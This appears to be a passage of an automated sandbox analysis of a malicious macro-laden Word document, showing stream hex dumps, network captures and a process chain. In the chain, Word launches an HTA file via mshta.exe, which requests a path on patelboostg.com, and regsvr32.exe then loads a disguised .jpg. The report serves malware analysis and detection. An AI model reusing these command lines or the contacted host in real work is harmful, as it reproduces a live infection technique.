                                                                                                                                                Data ASCII:. . . . . . . . s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                                                                                                                                                Data Raw:0a 06 0f 00 12 00 01 00 73 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                                                                                                                                Stream Path: Data, File Type: data, Stream Size: 26648
                                                                                                                                                General
                                                                                                                                                Stream Path:Data
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:26648
                                                                                                                                                Entropy:7.93699752134
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:. h . . D . d . . . . . . . . . . . . . . . . . . . . . Z - . % . % . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D . . . . . . . . . . . . . . . . . . . C . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . u . s . _ . . . . . . . . . . . . . . . b . . . . g . . . . . . . \\ u . V . . l o . + I . . . . \\ g . . . . . . D . . . . . . . . n . . T g . . . . . \\ u . V . . l o . + I . . . . P N G . . . . . . . . I H D R . . . . . . . . . . . . . . . . . . . . . g I F x N E
                                                                                                                                                Data Raw:18 68 00 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 5a 2d 20 0d 25 03 25 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 44 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 43 00 0b f0 20 00 00 00 04 41 01 00 00 00 05 c1 08 00 00 00 06 01 02 00 00 00 ff 01 00 00 08 00 75 00 73 00
                                                                                                                                                Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 398
                                                                                                                                                General
                                                                                                                                                Stream Path:Macros/PROJECT
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Stream Size:398
                                                                                                                                                Entropy:5.34409853619
                                                                                                                                                Base64 Encoded:True
                                                                                                                                                Data ASCII:I D = " { 6 6 C 4 7 8 6 9 - 5 3 2 7 - 4 B B 0 - A 8 5 4 - 1 C 9 A 9 1 5 0 0 5 8 1 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . M o d u l e = m a i n . . N a m e = " a t J H O i j " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " A C A E 3 F 7 6 4 1 A 9 4 5 A 9 4 5 A 9 4 5 A 9 4 5 " . . D P B = " E 3 E 1 7 0 4 3 A 6 4 4 A 6 4 4 A 6 " . . G C = " 1 A 1 8 8 9 9 C C 1 9 D C 1 9 D 3 E " . . . . [ H o s t E x t
                                                                                                                                                Data Raw:49 44 3d 22 7b 36 36 43 34 37 38 36 39 2d 35 33 32 37 2d 34 42 42 30 2d 41 38 35 34 2d 31 43 39 41 39 31 35 30 30 35 38 31 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 6d 61 69 6e 0d 0a 4e 61 6d 65 3d 22 61 74 4a 48 4f 69 6a 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56
                                                                                                                                                Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 56
                                                                                                                                                General
                                                                                                                                                Stream Path:Macros/PROJECTwm
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:56
                                                                                                                                                Entropy:3.05665670746
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . m a i n . m . a . i . n . . . . .
                                                                                                                                                Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 6d 61 69 6e 00 6d 00 61 00 69 00 6e 00 00 00 00 00
                                                                                                                                                Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2896
                                                                                                                                                General
                                                                                                                                                Stream Path:Macros/VBA/_VBA_PROJECT
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:2896
                                                                                                                                                Entropy:4.3263453539
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 1 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c .
                                                                                                                                                Data Raw:cc 61 b2 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                                                                                                                Stream Path: Macros/VBA/__SRP_0, File Type: data, Stream Size: 1708
                                                                                                                                                General
                                                                                                                                                Stream Path:Macros/VBA/__SRP_0
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:1708
                                                                                                                                                Entropy:3.55295478383
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ Z . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . A . < . M . . @ . Y . . . J . . . . . . . . . . . . .
                                                                                                                                                Data Raw:93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 01 00 09 00 00 00 2a 5c 43 4e 6f 72 6d 61 6c 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00
                                                                                                                                                Stream Path: Macros/VBA/__SRP_1, File Type: data, Stream Size: 241
                                                                                                                                                General
                                                                                                                                                Stream Path:Macros/VBA/__SRP_1
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:241
                                                                                                                                                Entropy:2.39835412071
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . i 7 C o m p u t e r M o n i t o r . . . . . . . . . . . . . . . . m o u s e V i d e o T . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff 06 00 00 00 00 00
                                                                                                                                                Stream Path: Macros/VBA/__SRP_2, File Type: data, Stream Size: 983
                                                                                                                                                General
                                                                                                                                                Stream Path:Macros/VBA/__SRP_2
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:983
                                                                                                                                                Entropy:2.01453026658
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:r U . . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` ) . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:72 55 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 04 00 04 00 00 00 00 00 01 00 01 00 00 00 01 00 71 07 00 00 00 00 00 00 00 00 00 00 a1 07 00 00 00 00 00 00 00 00 00 00 d1 07
                                                                                                                                                Stream Path: Macros/VBA/__SRP_3, File Type: data, Stream Size: 364
                                                                                                                                                General
                                                                                                                                                Stream Path:Macros/VBA/__SRP_3
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:364
                                                                                                                                                Entropy:2.2617201917
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . @ . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O . P . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O . O . P . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 40 00 e1 01 00 00 00 00 00 00 00 00 02 00 00 00 04 60 04 01 e1 0d ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                                                                                                                                                Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 553
                                                                                                                                                General
                                                                                                                                                Stream Path:Macros/VBA/dir
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:553
                                                                                                                                                Entropy:6.34791185753
                                                                                                                                                Base64 Encoded:True
                                                                                                                                                Data ASCII:. % . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . . . . c . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * , \\ C . . . . . . m . .
                                                                                                                                                Data Raw:01 25 b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 ef b5 c2 63 0e 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30
                                                                                                                                                Stream Path: WordDocument, File Type: data, Stream Size: 19522
                                                                                                                                                General
                                                                                                                                                Stream Path:WordDocument
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:19522
                                                                                                                                                Entropy:3.66495069994
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:. . . . U . . . . . . . . . . . . . . . . . . . . . . . j G . . . . b j b j . n . n . . . . . . . . . . . . . . . . . . . . . . . L . . . . . a . . . a j ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . > . . . . . . . > . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:ec a5 c1 00 55 00 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 6a 47 00 00 0e 00 62 6a 62 6a eb 6e eb 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 2e 4c 00 00 89 04 e9 61 89 04 e9 61 6a 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

                                                                                                                                                Network Behavior

                                                                                                                                                Network Port Distribution

                                                                                                                                                TCP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Dec 31, 2021 12:36:18.749280930 CET4974280192.168.2.345.67.229.54
                                                                                                                                                Dec 31, 2021 12:36:18.809099913 CET804974245.67.229.54192.168.2.3
                                                                                                                                                Dec 31, 2021 12:36:18.809228897 CET4974280192.168.2.345.67.229.54
                                                                                                                                                Dec 31, 2021 12:36:18.809828997 CET4974280192.168.2.345.67.229.54
                                                                                                                                                Dec 31, 2021 12:36:18.864554882 CET804974245.67.229.54192.168.2.3
                                                                                                                                                Dec 31, 2021 12:36:19.062393904 CET804974245.67.229.54192.168.2.3
                                                                                                                                                Dec 31, 2021 12:36:19.062480927 CET4974280192.168.2.345.67.229.54
                                                                                                                                                Dec 31, 2021 12:36:24.068007946 CET804974245.67.229.54192.168.2.3
                                                                                                                                                Dec 31, 2021 12:36:24.068242073 CET4974280192.168.2.345.67.229.54
                                                                                                                                                Dec 31, 2021 12:36:24.475716114 CET4974280192.168.2.345.67.229.54

                                                                                                                                                UDP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Dec 31, 2021 12:36:18.699207067 CET5787553192.168.2.38.8.8.8
                                                                                                                                                Dec 31, 2021 12:36:18.731417894 CET53578758.8.8.8192.168.2.3

                                                                                                                                                DNS Queries

                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                Dec 31, 2021 12:36:18.699207067 CET192.168.2.38.8.8.80xc4d3Standard query (0)patelboostg.comA (IP address)IN (0x0001)

                                                                                                                                                DNS Answers

                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                Dec 31, 2021 12:36:18.731417894 CET8.8.8.8192.168.2.30xc4d3No error (0)patelboostg.com45.67.229.54A (IP address)IN (0x0001)

                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                • patelboostg.com

                                                                                                                                                HTTP Packets

                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                0192.168.2.34974245.67.229.5480C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Dec 31, 2021 12:36:18.809828997 CET1160OUTGET /frhe/L8dclCye7SQ5WTFva78FDxOjGBOF9iJro4DRgV/5inYIaSBt0KLfMB9kXwZBv6ZpTsny6/qAhIQjrAaLKJeTLQnbCarASpMADNe9u19Kylnkoreo7/SjqMh4eEx0Hx9b4h5e2fMcQgeIbFT/kKeSzfUaenwSFB/ISkVIHedx0p/49280/SruwcI68Yb5pVaVqfvyOHztDsbEuhGxtlV6bpgPIFvGFQ277/7FkN9pAcaWDfFlGNBeuaqGed8iDibaWexT/GyAAzLRbFAU1XErrU1F/vaci3?page=V8BBaQuem65&page=XYvyd0Dcrg6fJYLGHRVWp7s1tv&page=dvZwXcjcYCjBX8tPaALshiDAx85PEq&sid=10tOgWzOZj9xyAidNJAz3d9Ob0 HTTP/1.1
                                                                                                                                                Accept: */*
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                Host: patelboostg.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Dec 31, 2021 12:36:19.062393904 CET1161INHTTP/1.1 200 OK
                                                                                                                                                Date: Fri, 31 Dec 2021 11:36:18 GMT
                                                                                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34
                                                                                                                                                X-Powered-By: PHP/7.2.34
                                                                                                                                                Content-Length: 204
                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 76 61 63 69 33 22 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL "vaci3" was not found on this server.</p></body></html>


                                                                                                                                                Code Manipulations

                                                                                                                                                Statistics

                                                                                                                                                Behavior

                                                                                                                                                Click to jump to process

                                                                                                                                                System Behavior

                                                                                                                                                General

                                                                                                                                                Start time:12:36:06
                                                                                                                                                Start date:31/12/2021
                                                                                                                                                Path:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
                                                                                                                                                Imagebase:0x1120000
                                                                                                                                                File size:1937688 bytes
                                                                                                                                                MD5 hash:0B9AB9B9C4DE429473D6450D4297A123
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                General

                                                                                                                                                Start time:12:36:13
                                                                                                                                                Start date:31/12/2021
                                                                                                                                                Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:explorer i7Gigabyte.hta
                                                                                                                                                Imagebase:0x920000
                                                                                                                                                File size:3611360 bytes
                                                                                                                                                MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                General

                                                                                                                                                Start time:12:36:14
                                                                                                                                                Start date:31/12/2021
                                                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                                                                Imagebase:0x7ff720ea0000
                                                                                                                                                File size:3933184 bytes
                                                                                                                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                General

                                                                                                                                                Start time:12:36:16
                                                                                                                                                Start date:31/12/2021
                                                                                                                                                Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Documents\i7Gigabyte.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                                                                                                                                                Imagebase:0x2a0000
                                                                                                                                                File size:13312 bytes
                                                                                                                                                MD5 hash:7083239CE743FDB68DFC933B7308E80A
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                General

                                                                                                                                                Start time:12:36:20
                                                                                                                                                Start date:31/12/2021
                                                                                                                                                Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Windows\System32\regsvr32.exe" c:\users\public\gigabyteI7.jpg
                                                                                                                                                Imagebase:0x830000
                                                                                                                                                File size:20992 bytes
                                                                                                                                                MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                Disassembly

                                                                                                                                                Code Analysis

                                                                                                                                                Reset < >